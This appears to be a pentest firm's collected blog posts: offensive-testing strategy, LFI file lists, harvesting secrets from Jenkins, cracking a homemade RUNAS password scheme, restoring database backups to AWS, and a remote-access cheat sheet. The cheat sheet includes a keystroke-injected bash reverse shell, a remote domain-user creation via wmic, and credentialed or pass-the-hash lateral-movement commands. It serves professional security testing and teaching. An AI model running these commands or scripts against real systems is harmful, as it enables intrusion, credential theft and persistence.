Advancing Strategic Security Goals with Offensive Testing

Your organization has a unique information security posture and nobody really understands it like you do. You are fighting a constant battle, not only against those who would attack your organization but for the resources required to perform your duties. You face competition for qualified personnel, push-back on costly best practices, and arguments against upgrading or purchasing critical new technology. Even when it seems like everything is ticking like clockwork, you know the storm is just over the horizon. The constant pressure of all these challenges can easily push the idea of offensive (penetration) testing way down the priority list. Additionally, penetration testing is often negatively framed as an unnecessary, disruptive exercise that generates additional busy-work for the already overtaxed security team.

In reality, offensive testing is a powerful tool for prioritizing and advancing your security program.

Advocating for the resources you need can be difficult, but a well-designed and executed penetration test can provide you with both the narrative and the metrics to reinforce your arguments. A penetration test can answer difficult questions, uncover critical issues, and break up analysis paralysis. The key lies in understanding what goals you are looking to achieve and working with your penetration testers to design an engagement that advances that agenda.

Often penetration testers will talk about the specific goals or “flags” for a particular engagement. An example would be “accessing credit card data” as part of a Payment Card Industry (PCI) compliance testing requirement. While it’s important to define these tactical goals that will be pursued during the test, it’s critical that everyone understand the larger, strategic goals you hope to achieve; they provide the foundation for the entire test. Effective communication of these goals helps you select the right penetration testing team, ensures the test is properly scoped, and makes certain the resulting report provides the greatest value for your budget. The exact motivations will be unique to your organization, but we detail seven of the most common starting points below.

Budget Balance

That brand new, next-gen AI powered Anti-APT wonder appliance (with customizable dashboards) might provide visibility into the dark corners of your network. However, you also need additional headcount to round out your team’s IR skillset. Or maybe you don’t really need either of those things. Offensive testing can demonstrably highlight the immediate need for your most requested resources. Setting a testing goal to determine gaps caused by a lack of resources provides insight into where your security budget would best be allocated and ammunition for why it should be increased. You could discover that instead of a new appliance, you simply need to deploy proper coverage of other technologies. Or maybe that appliance is exactly what you need to move your security program forward.

Alternative Analysis

Building secure systems is difficult. Getting Senior Developers, System Administrators, Network Engineers, and various other stakeholders to understand and properly implement security when designing a new system is an uphill battle. Their efforts are further hampered by the fact that they simply do not think like an attacker. Where a design team may see a series of reasonable and rational decisions and assumptions, an attacker may see a security hole through which they could drive a truck. Setting a goal of providing an alternative viewpoint, the viewpoint of an outside attacker, allows testing to discover gaps in the design and provide recommendations before it’s too late.

Details Matter

Implementation errors are perhaps the single largest source of vulnerabilities in all of information security. A solid design is a great foundation, but your systems are ultimately implemented by people, and people can be relied upon to make bad security decisions. The gaps between the secure design and the imperfect implementation can be difficult for automated scanning tools to discover but easy for an attacker to leverage. Setting a testing goal of discovering these types of implementation errors results in more robust and hardened systems.

Baselines

“We have never had a test.” Maybe your organization is just reaching the size and complexity where a penetration test could provide real insight. Or maybe you have just come on board to manage your organization’s information security program and are looking to better understand the landscape. Do you really know your current security posture, your Internet-facing attack surface, your susceptibility to phishing, or the security of your applications and databases? Setting a testing goal of assessing overall security health can provide a more accurate picture of your current environment and prioritize the biggest risks to your data.

Mergers & Acquisitions

Growth is an important aspect of business, but acquiring a new company often involves taking on an unknown level of risk. The merger may bring in a new technology stack which seems to be exactly what your company needs to increase its competitive advantage. However, integrating systems blindly may introduce a whole host of vulnerabilities into your organization, undoing years of hard work. Standardizing security assessments as part of the M&A process can help identify vulnerabilities, each carrying its own remediation cost. A third-party testing firm can provide the impartial assessment needed to move forward with confidence.

Vendor Security

Partnering with various vendors is critical to the success of your organization. Every vendor is ready to assure you that they take security “seriously” or even “very seriously”. Trust, but verify: a testing goal targeting vendor systems integrated with your organization is a solid starting point. Additionally, vendors should be able to produce sanitized versions of their own penetration testing reports as evidence of their “serious” commitment to security.

Blue Team Training

A key part of your blue team’s responsibility is to detect and respond to threats. Keeping these capabilities sharp requires both training and experience. Well-scoped Red Team and Purple Team engagements can provide valuable learning experiences for your blue team. Constructing a testing goal of providing a realistic attack scenario in a controlled fashion can identify gaps in your overall technology, training, processes, and design.

Working in information security requires finding the compromise between the ideal security and the reality of our chaotic world. Well planned and executed offensive testing can provide the arrows in your quiver needed to advance your information security program.

Knowing What To Expect - os-file-list

It’s something every web application penetration tester comes across. You uncover a possible weakness, maybe a local file inclusion, directory traversal, or other vulnerability that could allow for interaction with the file system. What you need to verify the finding is a known file in a known location and, most of the time, testers tend to choose the old stand-by “/etc/passwd”.

But what happens when the web application firewall designer is wise to your penetration tester tricks and blocks on a trigger of “/etc/passwd”? What happens when the verification of this vulnerability is not the end of the finding but the start of your larger attack? Flexibility and a depth of options become more important, and a larger list of potential local files can be very helpful.

os-file-list (https://github.com/DolosGroup/os-file-list) is a simple project designed to help penetration testers easily move past “/etc/passwd”, providing a base to cover various configurations and identify gaps in protections. os-file-list is a directory listing of world-readable files from the different Linux distributions available on leading cloud service providers. In addition to the world-readable files, we also provide readable file listings for a basic user with no special permissions as well as for the default user created by the cloud service provider (e.g. admin/ec2-user/root). We found the basic user listing useful when administrators create a limited user account (a best practice) for handling various tasks, and the default user listing useful when an administrator has failed to create a separate user.

The output is a simple one-file-per-line format, easily included in directory enumeration tools such as Burp Intruder or any custom-written script. Additionally, the script used to generate the directory listings is included in the project should anyone need to generate a custom listing.
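
As a quick illustration, here is a minimal Python sketch of feeding one of the listings into a suspected traversal point. The target URL and the "file" parameter are hypothetical placeholders for whatever injection point you have found:

import requests

# Hypothetical sketch: try each candidate path from an os-file-list
# listing against a suspected traversal/LFI parameter and report any
# non-empty responses. TARGET and the "file" parameter are placeholders.
TARGET = "https://target.example/download"

with open("file-list.txt") as fh:
    for path in (line.strip() for line in fh):
        if not path:
            continue
        url = TARGET + "?file=" + "../" * 8 + path.lstrip("/")
        resp = requests.get(url, timeout=10)
        if resp.status_code == 200 and resp.content:
            print(len(resp.content), path)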

Project URL: https://github.com/DolosGroup/os-file-list

Pillaging The Jenkins Treasure Chest

Jenkins is a popular target for penetration testers, mainly because certain server configurations expose the Groovy Script Editor which, provided the proper payload, can lead to remote code execution on the server. Increasingly, though, this technique works less and less often.

Despite this, even if you don’t have access to the Groovy Script Editor, you still stand a decent chance of getting something valuable out of Jenkins. It tends to be a treasure trove of information in certain organizations, and it’s all too easy for a developer or operations team to leave something behind “just to get things done”.

A little background: Jenkins is an automation server that lets developers automate building software, running tests on that software, and so on. The “builds” that Jenkins runs can contain things like the console output of the build process (basically stdout of a bunch of commands and scripts), associated files in the form of “workspaces”, inherited environment variables, and much more.

Let’s talk about a couple of these:

Console Output

During a pentest, we found a Jenkins server with hundreds of “builds”, each containing a handy button on the left side called “Console Output”.

[Screenshot: the “Console Output” link on a Jenkins build page]

Intrigued, we clicked on it and saw what ended up being the literal stdout of the build process. Most of the console output we checked was mostly useless, but some? Not so useless. A couple of examples of what we’ve seen:

  • Curl/wget commands with plaintext creds to different services

  • Contents of certain automation scripts

  • Failed test cases containing SOAP requests & developer credentials

  • SSH private keys as part of a deployment script

  • MySQL client, JDBC connection strings, and sqlplus credentials

Interestingly, we saw that several instances of the exposed data actually appeared because some part of the build process had failed, dumping the data into error messages or stack traces. Had the build succeeded, nobody might ever have known. This goes to show that failure conditions can be just as important as success conditions, if not more so.

We found that the “Console Output” was present in every build we came across and was a very reliable source of sensitive information.
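
When the build history is large, there is no need to click through it by hand. Below is a rough Python sketch of automating the review via Jenkins’ JSON API and the consoleText endpoint; the server URL, job name, and search patterns are placeholders, and you may need to supply credentials:

import re
import requests

# Rough sketch: walk a job's build history via the JSON API and grep
# each build's consoleText for likely secrets. Server URL, job name,
# and patterns are placeholders; pass auth=(user, api_token) if needed.
JENKINS = "http://jenkins.example:8080"
JOB = "deploy-app"
NEEDLE = re.compile(r"password|passwd|secret|token|BEGIN (RSA|OPENSSH)", re.I)

builds = requests.get(f"{JENKINS}/job/{JOB}/api/json", timeout=10).json()["builds"]
for build in builds:
    text = requests.get(build["url"] + "consoleText", timeout=30).text
    for line in text.splitlines():
        if NEEDLE.search(line):
            print(build["number"], line.strip())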

Workspaces

Certain projects are more complicated and require accompanying files to build correctly. These could be source code, private keys, certificate bundles, credentials, configs, or anything else. You can think of workspaces the same way you think of directory indexing on web servers.

[Screenshot: a Jenkins workspace file listing]

Workspaces did not appear in as many builds as the console output did, but tended to contain even more sensitive information. A couple of things we found in workspaces:

  • “Protected” source code

  • Many web.config files containing DB connection details

  • .ssh folders with private keys & known hosts files

  • Client certificates & credentials for connecting to APIs

  • Included but unused scripts containing hardcoded credentials

  • AWS deployment ID & secret keys

We found that workspaces tended to contain a lot of data they didn’t need. After all, it’s easier to include a whole directory structure than to specify which directories are important.
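
Conveniently for us, the workspace page also includes an “(all files in zip)” link, so the whole workspace can usually be grabbed in a single request. A quick sketch, again with placeholder server and job names:

import requests

# Quick sketch: download an entire Jenkins workspace as a zip via the
# "(all files in zip)" endpoint. Server URL and job name are placeholders.
JENKINS = "http://jenkins.example:8080"
JOB = "deploy-app"

resp = requests.get(f"{JENKINS}/job/{JOB}/ws/*zip*/workspace.zip", timeout=300)
with open(f"{JOB}-workspace.zip", "wb") as fh:
    fh.write(resp.content)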

Environment Variables

It’s well known within the developer community that including credentials in source code is a pretty big no-no. While this advice is often ignored, some developers follow the guidance of “include credentials and API keys as environment variables” instead, which is better. Well, Jenkins can expose those too.

You can configure certain builds to inherit particular environment variables that the build can refer to during its creation process. Things we’ve seen from exposed environment variables (a retrieval sketch follows the list):

  • Internal network information for where the build is being deployed

  • Credentials

  • Proxy settings

  • Paths, usernames, emails, and admin URLs
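
When the EnvInject plugin is in use, each build publishes its variables under an injectedEnvVars endpoint. A sketch of pulling them, assuming that plugin is installed (the build URL is a placeholder):

import requests

# Sketch: dump a build's injected environment variables. Assumes the
# EnvInject plugin is installed; the build URL is a placeholder.
BUILD = "http://jenkins.example:8080/job/deploy-app/42"

env = requests.get(f"{BUILD}/injectedEnvVars/api/json", timeout=10).json().get("envMap", {})
for key, value in sorted(env.items()):
    print(f"{key}={value}")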

Tool Release

These techniques have been used to compromise multi-billion-dollar corporations and are incredibly useful in today’s application development landscape. If you come across a Jenkins server during a pentest, we highly recommend taking a look at the accessible internals. Unfortunately, grabbing all these pieces manually from the web interface can be tedious. We are releasing Jenkins-Pillage to gather this information automatically, quickly, and easily.

https://github.com/DolosGroup/Jenkins-Pillage

Pentest Deep-Dive: Custom RUNAS

Information Security often exists in a delicate balance with business demands. Organizations weighing security against functionality, cost, ease-of-use, or time for development, commonly choose imperfect but realistic compromises.

For the most part, these compromises allow for progress towards business objectives while maintaining an acceptable balance. Other times—especially in the absence of a proper security evaluation—organizations can inadvertently deploy solutions that drastically increase their risk.

During a recent internal network penetration test, we came across a prime example of an unbalanced solution. To solve the old problem of "How do we allow our users to install approved applications on their systems?", this organization developed a custom solution in-house. Installation scripts for the approved applications were placed within a directory on the C:\ drive and, via an easy-to-use GUI, users could select which program to install, triggering the associated script.

As a security consideration within this environment, users were not administrators on their assigned systems. However, most of the approved applications required administrator privileges to install.

As a security inconsideration, all the user workstations had been configured with a shared local administrator password so a single version of the script could be deployed on every system.

At some point, we imagine the idea was floated to use the RUNAS command in a batch file to execute the installation as the local administrator. However, RUNAS expressly does not accept a password on the command line, as doing so would inevitably lead to weak deployments. As described by Microsoft’s Raymond Chen:

This was a conscious decision. If it were possible to pass the password on the command line, people would start embedding passwords into batch files and logon scripts, which is laughably insecure.
— https://blogs.msdn.microsoft.com/oldnewthing/20041129-00/?p=37183

Raymond kindly offers an option for those looking to head down this bad-decision rabbit hole: creating a custom executable using the CreateProcessWithLogonW function, which does allow plaintext passwords from the command line. And as such, a custom executable which solved this corporate need was born. For the purposes of this writeup we will call it RUNAS_A.exe.

At first glance, we can see the developer attempted to avoid using plaintext passwords as command line arguments by instead requiring an encrypted value. For example:

     RUNAS_A /user administrator /pass <EncryptedPassword> “C:\installApp\install.bat”

But wait, couldn’t any user run any command as the local administrator by merely using the same command line string with a different command? e.g.:

     RUNAS_A /user administrator /pass <EncryptedPassword> “C:\evilApp.exe”

You guessed it. A static value, whether “encrypted” or not, does not prevent abuse given the design of this application. With this knowledge, an attacker could perform horizontal and vertical (per-system) privilege escalation across all machines sharing the Local Administrator credential.


Let’s dive a little deeper…

When first looking at the RUNAS_A command string, we noticed the password value was base64 encoded. For example:

     RUNAS_A /user admin /pass lkB6RJYwDDFtbxckaGeaUuQwWnXpcAsuHEmaMNAhrQ== “C:\installApp\install.bat”

Our hopes that someone had made the classic mistake of confusing encoding with encryption were soon dashed; the password string had likely been base64 encoded simply to avoid unprintable or control characters in the encrypted value.

[Screenshot: Decoded Encrypted Password]

The password was easily decoded but still encrypted. With access to the RUNAS_A executable, we took a look to see what it was doing regarding encryption. Before starting any serious reversing effort, we tried running the application with no options provided.

[Screenshot: Running RUNAS_A.exe]

One of the options of RUNAS_A is an "encryption mode" that lets you encrypt passwords before use. Let's try a quick known-plaintext attack to see if we can figure out what is going on.

[Screenshot: Encrypting a Password with RUNAS_A.exe]

Decoding our base64 output gives us the encrypted password.

[Screenshot: Decoded Encrypted “testpassword” Password]

Time to take a long look at the output and identify the encryption algorithm? After looking at it for barely a second, we realized the “encryption” merely interleaves a random character with each character of the password.

[Screenshot: “DECRYPTED”]

Taking another look at our original encrypted password from the batch file, we can see it “decrypts” to “@D01o$gROup.IO!”, which, for the purposes of this writeup, is the shared local administrator password.

[Screenshot: Decrypted Original Password]

Another bittersweet moment in information security where, as the riddle is solved, the horrible truth is revealed. Not only is encrypting the password useless in restricting use of the credentials, but the encryption itself is useless in preventing anyone from learning the plaintext of the password. We have seen CTF puzzles designed for children that provided a greater cryptanalysis challenge than this application.

Diving a bit deeper into the RUNAS_A executable (using ILSpy, as RUNAS_A.exe is .NET), we can see that the "encryption" function, "EncodePID", involves pairing up random characters with the characters of the password and then base64 encoding the string.

[Screenshot: Encryption Function]

The “decryption” function is similarly simple, pulling out every other byte from the “encrypted” password.

[Screenshot: Decryption Function]
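
The entire “cryptosystem” fits in a couple of lines of Python. A sketch of the decryption, assuming (as we observed) that the password characters sit at the even offsets of the decoded blob:

import base64
import sys

# Sketch of RUNAS_A's "decryption": base64 decode the blob, then keep
# every other byte. We assume the password characters sit at the even
# offsets; if the output looks like noise, try blob[1::2] instead.
blob = base64.b64decode(sys.argv[1])
print(blob[::2].decode(errors="replace"))

Feeding it the value from the install script prints the shared local administrator password.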

Ultimately, what we have here is a poorly balanced solution and a study in avoidance. There was a need for deploying software, on demand, to end users. To avoid making every user a local administrator, a single administrator account was reused on every system. To avoid the security restrictions of a commercially available tool, an insecure, in-house application was developed. To avoid the appearance of plaintext credentials within the installation scripts, pointlessly “encrypted” credentials were used. Finally, the golden rule of “Don’t Roll Your Own Crypto” was avoided in spectacular fashion.

Frustratingly to the InfoSec mind, this security train wreck of a solution has been functioning without issue since it was developed and deployed in 2006. The original perpetrators have long since left the organization and, as the application itself has not been a squeaky wheel, it has gotten no security grease.

Hidden issues like these are the sort of findings a penetration test can uncover. Vulnerability scanning will never identify issues like these within a custom application, there will never be a vendor patch or update, and it's too vital an application to decommission for no reason. A quality penetration test can not only discover problems like this but help demonstrate the exact impact, make the argument as to why things need to change, and offer advice on bringing your program back into balance.

Restore a SQL Server Database to AWS

It happens to all testers eventually. You come across a file share hosting dozens of database backups. Giddiness ensues as you realize you have full read access and can copy any of them down to your dropbox, until you notice the database backups are tens, if not hundreds, of gigabytes in size. However, in this particular situation you simply have neither the hard drive space nor bandwidth to pull down a massive database backup and boot up a virtual machine to search through the data in a timely fashion.

Cue Amazon Web Services (AWS). We can upload the database backup to a secure, non-public S3 bucket and have Amazon Relational Database Service (RDS) restore the database directly. This means we can have access to that data in as little as 10 minutes while all the “heavy lifting” is performed by the cloud.

***NOTE: This script can help you demonstrate the impact of test findings without overtaxing your time or hardware, but remember to always discuss any potential use of cloud technology during the engagement with your clients before testing begins.

Unfortunately, AWS likes to complicate things, and there are quite a few steps involved in performing those two actions. At the bottom is a link to a bash script that handles the entire exchange. The input is simply the database backup file to be uploaded and the name of the database. After a successful upload and restoration, you are provided with a table count and connection details for further queries.
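
For the curious, the restoration itself boils down to two stored procedures AWS documents for RDS SQL Server native backup and restore, which the script drives through sqlcmd. A simplified Python sketch of just that step; the host, credentials, database name, and S3 ARN are placeholders:

import subprocess

# Simplified sketch of the two documented RDS stored procedures the
# script wraps. Host, credentials, database name, and S3 ARN below are
# placeholders for the values the script generates.
HOST = "db-sql-restore-xxxx.us-east-1.rds.amazonaws.com"
AUTH = ["-S", HOST, "-U", "user34wkeceq", "-P", "pass9zoacs5"]

restore = ("exec msdb.dbo.rds_restore_database "
           "@restore_db_name='MYDATABASE', "
           "@s3_arn_to_restore_from='arn:aws:s3:::my-bucket/backup.bak';")
subprocess.run(["sqlcmd", *AUTH, "-Q", restore], check=True)

# Poll this until the RESTORE_DB task reports SUCCESS
subprocess.run(["sqlcmd", *AUTH, "-Q",
                "exec msdb.dbo.rds_task_status @db_name='MYDATABASE';"], check=True)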

Running without any arguments:

$ ./sql-backup-restore.sh
usage: ./sql-backup-restore.sh options
This script restores a SQL Server database backup to AWS and returns
connection details & a table count

OPTIONS:
   -h      Show this message
   -f      The SQL Server Database backup file (usually .bak)
   -d      Database Name (ex. MYDATBASE)

Running on a test database:

$ ./sql-backup-restore.sh -f /mnt/FileSrv_IP/DB_Backups/JulyDatabaseBackup.bak -d THISISMYDATABASENAME
[*] Creating S3 Bucket to store database backup: s3-sql-restore-wi41zjcsdg
[*] Uploading backup file (/mnt/FileSrv_IP/DB_Backups/JulyDatabaseBackup.bak) to S3 bucket (s3-sql-restore-wi41zjcsdg)
upload: ../JulyDatabaseBackup.bak to s3://s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak
[*] Creating a VPC security group allowing TCP1433 inbound for RDS
[*] Creating the IAM Role & Policy so RDS can access S3
[*] Creating an option group (option-group-sql-restore) to hold the SQLSERVER_BACKUP_RESTORE option for RDS
[*] Adding the SQLSERVER_BACKUP_RESTORE option to option-group-sql-restore group
Username: user34wkeceq
Password: pass9zoacs5
[*] Creating the RDS SQL Server Database - db-sql-restore-rwkmm7hog ~15mins
[*] RDS SQL Server now starting
RDS Still coming up...may take a few minutes
<SNIP>
RDS Still coming up...may take a few minutes
RDS Still coming up...may take a few minutes
[*] SQL Server hostname:
Hostname: db-sql-restore-rwkmm7hog.cicdy9uy2.us-east-1.rds.amazonaws.com
Username: user34wkeceq
Password: pass9zoacs5
[*] Restoring the SQL server database from S3
[*] still restoring the DB
<SNIP>
[*] still restoring the DB
          1 RESTORE_DB                                         THISISMYDATABASENAME                                                    [2019-01-18 1 2019-01-18 16:42:22.087 2019-01-18 16:41:15.730 arn:aws:s3:::s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak                                                                                                                                                                                                                                                                                                      0 NULL
[*] Row count for all tables in the database
Changed database context to 'THISISMYDATABASENAME'.
                         rows
------------------------ -----------
sysclones                          0
sysseobjvalues   
<SNIP>                          1220
sysschobjs                      2428

(94 rows affected)
[*] Run whatever SQL queries you want with:
sqlcmd -S db-sql-restore-rwkmm7hog.cicdy9uy2.us-east-1.rds.amazonaws.com -U user34wkeceq -P pass9zoacs5

Now, while the script relies on Microsoft’s “sqlcmd” to run the stored procedures automatically, there is nothing stopping you from connecting with something like SQL Server Management Studio for autocomplete and other features.

The tool can be found here: https://github.com/DolosGroup/sql-backup-restore

Inside the wire at GSX 2018

This Tuesday at the ASIS Global Security Exchange (GSX) in Las Vegas, Mike Kelly and I presented our talk “Network Attacks Against Physical Access Controls”, covering our experiences attacking organizations’ physical security controls after network compromise. This is a topic we had spoken about before at other conferences (HushCon, THOTCON), but GSX was our first opportunity to move this conversation outside the strictly Information Security community and speak directly with the type of people and organizations that would be on the receiving end of these attacks.

Mike and I work as penetration testers and Red Team members, assessing the security of computer networks, systems, facilities, and personnel for numerous organizations. Most commonly, our clients are responsible for IT or Information Security at their organizations, and requests for physical security testing primarily focus on a basic scenario: “Can an attacker leverage physical access to our facility to gain access to our internal network?” Findings for these physical security engagements detail the methods an attacker, without network access, would use to physically compromise a location to gain a network foothold. This attack methodology provides value to the Information Security team, where protecting IT resources is the overall goal and where physical compromise is a means by which an attacker may attempt to bypass other defenses.

What we found missing from this methodology was a broader understanding and assessment of the physical security perimeter as a target itself. When we consider physical security controls as more than just a barrier protecting the network, and instead think about their role in protecting the physical security and safety of the entire organization, we find that many of the more common attack tactics and techniques fall short of assessing the complete physical security attack surface.

Understanding where your perimeter begins is a vital part of building a comprehensive security program. It’s easy to say that the physical security perimeter starts at the edge of the property, the main gate, or the limit of the security cameras’ field of view, but these answers fail to consider the current level of connectivity found in the majority of organizations. Physical Access Control Systems (PACS) hardware and software have evolved from using dedicated equipment, cabling, and protocols to being near plug-and-play with the rest of the network. At the same time, the explosion of internet-based attacks against organizations’ networks and personnel has effectively expanded that physical security perimeter to include the entire world.

In our presentation we talked about how physical security testing is progressing: moving past some of the more traditional techniques such as lockpicking and tailgating or piggybacking, and past more recent methods like long-range RFID badge cloning. We provided a number of examples of different techniques we had put into practice during engagements targeting physical access control systems after achieving unauthorized network access.

The first method we covered involves attacking the PACS hardware/firmware directly. During a Red Team test, Open Source Intelligence (OSINT) gathering revealed the exact model of door controller installed at the target facility. After acquiring one of the devices, Mike discovered a weakness in the system’s communication protocol (CVE-2017-16241) and developed a working exploit. As a result, we were able to remotely unlock the doors of the targeted facility, including those protected by biometrics. Similar research into these types of systems is ongoing, with the most recent example being “I’m the One Who Doesn’t Knock”, a talk by Google’s David Tomaschik at DEF CON 26.

Next, we spoke about attacks against the PACS backend systems and supporting infrastructure. These fall in line with what we would see in a network penetration test. Instances of improperly stored database backups containing badge numbers, PACS software with default credentials (including unchangeable passwords), unencrypted communications, and a lack of network segmentation resulted in the capture of sensitive badge credentials and the ability to assume direct control of employee badging and surveillance camera systems.

Finally, we covered exploiting common user errors to gain physical access. These often follow a pattern of weak password selection combined with a failure to understand the sensitivity of information like employee badge numbers. While most people would pause before emailing a spreadsheet full of unencrypted passwords, a list of employee badge numbers may not elicit the same caution. Compromising one employee email account can lead to an attacker having all of the information needed to create functional clones of employee badges for the entire organization.

One of our main motivations for presenting at GSX was the opportunity to speak with the people at the intersection of information and physical security. The separation of responsibilities between an organization’s information security team and the operations/physical security team can complicate communicating the level of risk revealed by this type of testing, and opportunities to bridge that gap are key. The Q&A session and discussions we enjoyed with our audience and the other attendees at GSX provided us with valuable insight into the challenges facing all of us as we continue to work towards a more secure world.

For more information on this topic, please feel free to contact us at info@dolosgroup.io.

Remote Access Cheat Sheet

Since the advent of networked computers, administrators have had a legitimate need to remotely control systems. Several technologies have emerged to facilitate this, including built-in solutions as well as third-party options. As the list grows, pentesters/attackers have a growing list of options at their disposal; however, we haven't found a good resource that catalogs them for quick reference.

In coordination with @atucom and @thejosko's talk "Not Your Daddy's Winexe", presented at Thotcon 0x9, we have assembled this cheat sheet for remotely accessing systems. Most of the following methods will require pre-existing knowledge of credentials, or access to a machine that can be leveraged for lateral movement.

If you see any of the following ports open, the corresponding technologies might be configured to allow remote access:

Port                     Technology
3389/TCP                 Remote Desktop Protocol (RDP)
5900/TCP                 VNC, Apple Remote Desktop (v2)
3283/UDP                 Apple Remote Desktop (v1)
6000+N/TCP               Xorg
2701/TCP                 SCCM Remote Control
23/TCP                   Telnet
512-514/TCP              rlogin/rsh
22/TCP                   Secure Shell (SSH)
445/TCP                  Server Message Block (SMB)
5985/TCP, 5986/TCP       WinRM (HTTP/HTTPS)
135/TCP (+ high port)    RPC/DCOM (WMI, Scheduled Tasks, MMC2.0, ShellWindows)

Remote Desktop Protocol (RDP)

RDP is Microsoft's built-in remote desktop solution that ships with all versions of Windows. The service is not listening by default, but it is commonplace to enable it in corporate environments. 

Port: 3389/TCP

Tools: Microsoft Remote Desktop Client (Windows/Mac), rdesktop, xfreerdp

Examples:

  • C:\Windows\System32\mstsc.exe
    
  • rdesktop -g 80% 192.168.112.200
  • xfreerdp /u:josh /d:testlab /pth:64f12cddaa88057e06a81b54e73b949b /v:192.168.112.200

Virtual Network Computing (VNC)

VNC was created as a vendor-agnostic graphical desktop solution and is widely deployed in *nix environments. Historically, it was commonly deployed without authentication; modern servers strongly urge administrators to configure a password.

Port: 5900/TCP

Tools: The plethora of open-source VNC applications, RealVNC, TightVNC, Screen Sharing (Mac)

Examples:

  • vncviewer 192.168.1.1:0

Apple Remote Desktop (ARD)

ARD is Apple's graphical remote desktop solution. The service is not listening by default, and in our experience it is not widely deployed. 

Port: 3283/UDP (v1), 5900/TCP (v2)

Tools: Screen Sharing, VNC applications

Examples:

  • /System/Library/CoreServices/Screen Sharing.app
    
  • vncviewer

Xorg

The X.Org Foundation creates and maintains the widely deployed X11 windowing system used in most *nix environments. Most administrators are aware that the client-server model allows forwarding of X sessions over SSH tunnels; however, when configured to allow TCP sessions, the X session can be attached to remotely. The default X11 configuration was changed to disallow TCP sessions several years ago, but we still see it from time to time. If you see TCP 6000+N open, you can likely execute code on that machine or remotely log keystrokes.

Port: 6000+N/TCP, (or 22/TCP via SSH)

Tools: xspy, xwatchwin, xwd, xvkbd, ssh, MSF, xrdp.py

Example screenshot:

xwd -root -screen -silent -display 192.168.37.146:0 > screenshot.xwd


Example keyboard injection:

xvkbd -no-repeat -no-sync -no-jump-pointer -remote-display 192.168.37.146:0 -text "/bin/bash -i > /dev/tcp/192.168.37.101/8000<&1 2>&1\r"


Example remote keylog:

xspy 192.168.1.1

System Center Configuration Manager (SCCM) Remote Control

SCCM is often used in enterprise networks to handle patch deployment for workstations and servers, as well as to facilitate installation of applications to groups of managed systems. Through the administration console, managed systems can be configured to start a remote control service (System Center Remote Control). While it provides similar functionality to RDP, it does not leverage Terminal Services, and in certain configurations it can allow full control of a remote system without alerting logged-on users to the session hijack.

Port: 2701/TCP

Tools: CmRcViewer.exe, SCCM Admin console
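
Example (assuming the console binaries are available locally; the viewer accepts the target hostname or IP as its first argument):

  • CmRcViewer.exe 192.168.112.200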

Note: If you are not inclined to download a random executable from the Internet (duh), the SCCM Remote Control client can be found at C:\Program Files (x86)\Microsoft Configuration Manager\AdminConsole\bin\i386\ after installing SCCM. Be warned, setting up an SCCM lab is unfathomably complicated.


Telnet

Modern operating systems no longer leverage telnet, but we still see it on almost every pentest, usually on embedded devices or legacy systems. This old-skool command line console access operates as a cleartext protocol and has largely been replaced by SSH.

Port: 23/TCP

Tools: Telnet, Netcat (nc), Ncat

Examples:

  • telnet 192.168.1.1
  • nc 192.168.1.1 23
  • ncat 192.168.1.1 23

RLogin/Rsh

The Berkeley alternative to the Telnet standard was used on *nix systems for decades before being replaced by SSH. Rather than requiring user/password authentication, administrators could specify source machines that were considered authenticated via a .rhosts file. Rlogin is an interactive shell, similar to telnet; rsh can be used to execute a single command.

Port: 512-514/TCP

Tools: rlogin, rsh, remsh, rexec, rcp

Examples:

  • rlogin -l josh 192.168.1.1
  • rsh -l josh 192.168.1.1 "ping -c4 192.168.1.2"

Secure Shell (SSH)

It's everywhere in the *nix world, and it has a ton of features built in that attackers can leverage for pivoting, tunneling X sessions, file transfers, etc.

Port: 22/TCP

Tools: ssh, PuTTY

Examples:

  • ssh root@192.168.1.1

Server Message Block (SMB)

SMB has been leveraged for file sharing and administration on Windows and *nix systems for decades. Another feature often abused by attackers is the use of administrative shares (C$, ADMIN$, IPC$) to push a service binary to a target machine, then start the service for semi-interactive I/O. Sysinternals Suite includes the PsExec binary, which is largely credited with pioneering this technique. Local administrative privileges are required to push the service binary to the ADMIN$ share, after which an RPC/SVCCTL call creates and starts the remote service. IPC$ is leveraged to create named pipes for input and output, which act as a semi-interactive shell.

Port: 445/TCP (SMB), 135/TCP (RPC), High-random port

Tools: PsExec.exe, psexec.py (impacket), winexe, MSF, smbexec

Examples:

  • PsExec.exe \\192.168.1.1 -u josh -p Password1 cmd.exe
    
  • winexe --system --uninstall -U testlab/josh%Password1 //192.168.112.200 cmd.exe
  • psexec.py 'josh':'Password1'@192.168.112.200 cmd.exe
  • smbexec.py 'josh':'Password1'@192.168.112.200 cmd.exe

Windows Remote Management (WinRM)

WinRM is Microsoft's implementation of the open WS-Management standard for SOAP-based remote management. Microsoft includes several standalone tools (winrm, winrs), and it is also the underlying technology used for PowerShell Remoting. Under the surface, WinRM makes use of WMI queries, but it can also leverage the IPMI driver for hardware management. It's a terribly powerful tool, albeit not widely deployed yet due to its relative infancy.

Port: 5985/TCP (HTTP), 5986/TCP (HTTPS)

Tools: winrm, winrs, PowerShell Remoting

Example list services:

winrm enumerate wmicimv2/Win32_Service -r:192.168.112.200


Example execute ipconfig (or any other code):

winrs /r:WIN-DEHIB5FROC2 /u:josh /p:Password1 ipconfig


Example PSRemote cmdlet on remote system:

PS> Invoke-Command 192.168.112.200 {Get-Service *}


Example PSRemote interactive PS Session:

PS> Enter-PSSession -ComputerName 192.168.112.200 -Credential testlab\josh
PS> ...
PS> Exit-PSSession

Windows Management Instrumentation (WMI)

WMI is Microsoft's consolidation of system management under a single umbrella. It is leveraged heavily under the hood for local operation, but can also be used for remote execution. Several built-in tools exist for either WQL query execution or full code execution. Impacket includes wmiexec, which also provides a semi-interactive shell.

Remote WMI queries use RPC/DCOM as the communication bus.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: wmic, Get-WmiObject (PowerShell), pth-wmic, wmiexec.py (impacket)

Example list services:

wmic.exe /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 service get "startname,pathname"


Example execute code (add user):

wmic /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 process call create "net user hacker Str0nGP_$sw0rd /add /domain"


Example list services (via PS cmdlet):

PS> Get-WMIObject -ComputerName 192.168.112.200 -query "Select * from Win32_Service"


Example list processes (via linux wmic util):

pth-wmic -U testlab/josh%Password1 //192.168.112.200 "select csname,name,processid,sessionid from win32_process"


Example semi-interactive shell (impacket):

wmiexec.py 'josh':'Password1'@192.168.112.200

Scheduled Tasks 

